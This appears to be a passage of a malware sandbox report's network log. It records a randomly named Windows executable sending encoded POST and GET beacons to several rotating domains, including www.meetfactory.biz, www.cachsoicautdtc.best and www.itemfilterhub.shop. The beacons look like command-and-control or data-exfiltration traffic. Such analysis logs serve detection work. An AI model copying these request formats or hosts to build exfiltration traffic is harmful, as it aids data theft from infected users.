                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:36:26.854825020 CEST | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:26 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49748 | 72.14.178.174 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:29.385818958 CEST | 552 | OUT | GET /o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:36:29.519345999 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:29 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: 49C<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728473789.0071446818&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICI5QjZoPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZGbFM9M2xkSDVka0gtZEJMZiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsa [TRUNCATED]
Oct 9, 2024 13:36:29.519380093 CEST | 59 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: } </script> </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49750 | 172.67.191.241 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:07.628859043 CEST | 832 | OUT | POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
Oct 9, 2024 13:38:07.736970901 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:22 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQ1vhDzew5KD6KeLZgP%2FG6T0kV48G3oEB7pjCulSitPF6RWxI2wQNy%2BtwDSGu49GIMccWGZHiiaCBveFsXG8HreVAhw28JOSQYLCWUmfEtuNxpG87QJ2%2BjDXqmBcZWbkr7KkKCdSX0RFjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1525fe470cc8-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:38:07.737091064 CEST | 1172 | IN |
Oct 9, 2024 13:38:07.737102032 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49751 | 172.67.191.241 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:10.251105070 CEST | 852 | OUT | POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLz+eI8WE8arpUOe3J3Y2Jmygl1lnOPRvdC6rqL+ed2Zvp1amJ18I99Qa7VbpVpyDSNpI1G4UHfkheNWsafR4fHLckpH8EgTl20LsnPQ1HNogP05kKGDfnLBzjJQ1qkACGAGs3Xn7lwg=
Oct 9, 2024 13:38:10.357562065 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:25 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BNOmL4dh5VPKKLEPtm8qWwHw8zZ%2F%2BIJBhOdT6QhMdtAwTvQh3B8EqFrPPBcC%2FOpKqQ7q3xqW%2Br9fTvWzxovW%2BxKQ0xhAKIC6NH6T74ap%2FvftFwbxDfDHsli%2FR2zjX1QND0XUDCWbnuCig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15365e6d43be-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49752 | 172.67.191.241 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:12.875029087 CEST | 1289 | OUT | POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:12.983220100 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:27 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuHcoaNo%2BJB1tgzo4wszli8GaECsSrCcjgovlkSpqgNx1%2BZgnlyT4%2BVPljDsUFJIjAstM3RW%2FM%2FBzIkMSosmHUsNtYvkISpqMgAVLbk4ANcwANU0FPGfzs1AYBAvBKe7lrsnvm0J%2Fm6MhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1546cf600f89-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49753 | 172.67.191.241 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:15.499568939 CEST | 556 | OUT | GET /fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:15.610013962 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:30 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m80Cn95ZP8xe5WAgDf%2FeBKhbqCPOih%2F0niV1q%2FAUvyklueH1kQuNds19p8t%2F5z06iqaXqf1brZAWVuvdkAIEQaBixsMbAdHh1bVHZVNe3YcrYYcOQTI2HvCWW1%2FVp47CqCyXBooR15n62w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1557298f42e0-EWR
                                                                                                                                                                                                                                                              Data Ascii: 11ab<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" />
Oct 9, 2024 13:38:15.610105991 CEST | 1289 | IN | Data Raw: 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                              Data Ascii: <meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.err
Oct 9, 2024 13:38:15.610236883 CEST | 1289 | IN | Data Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20
                                                                                                                                                                                                                                                              Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-c
Oct 9, 2024 13:38:15.610250950 CEST | 1289 | IN | Data Raw: 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52
                                                                                                                                                                                                                                                              Data Ascii: <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8cfe1557298f42e0</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-
Oct 9, 2024 13:38:15.610261917 CEST | 87 | IN | Data Raw: 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d
                                                                                                                                                                                                                                                              Data Ascii: pper --> <script> window._cf_translation = {}; </script></body></html>
Oct 9, 2024 13:38:15.610315084 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49754 | 104.21.50.202 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:20.839765072 CEST | 829 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
Oct 9, 2024 13:38:21.259969950 CEST | 743 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIWC55kW3X3%2FcYvTaNzkwkb0SNc%2BNT5XCawce8u9Yf1%2FKD50yY3gWrceg7ObjBd5qdi5QQ2f6kEmG3rB%2F98Z0nmfJV4gLE0HZTuEyIoUvMd8D%2BVUD7n6XygaeNXE77flRBrLLd9kdjg%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1578884d7280-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
Oct 9, 2024 13:38:21.260082006 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49755 | 104.21.50.202 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:23.467556000 CEST | 849 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXrxwVXpvM5mEVB5mJld/z1SUpRBLWeiruhVLBWGKebWsK/VFzLdT4BYyIK6v5Sv+NrfHZtf19QQelg4qxWXXnz9c+3mZKTHoXdgVrzOJhtsHqDur/4zLGtGQEpkRDDiVDDNo5kfEvues=
Oct 9, 2024 13:38:23.711045027 CEST | 731 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sPDkqJTcXfDyauy2SIWOH0gSxDEm3LcKYwlPtASNh7I82in%2FQkv3qzapVswl%2B%2FLkj%2BeOmdpjXdxFTWuo0kE3iYelYapqS0sRR0ousmPEAzhECABs36DtdRvgSefKan7h5D7%2BuUyhxIvI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1588fc5a43d3-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:38:23.711055994 CEST | 20 | IN | Data Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a8>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49756 | 104.21.50.202 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:26.092662096 CEST | 1289 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:26.963123083 CEST | 733 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
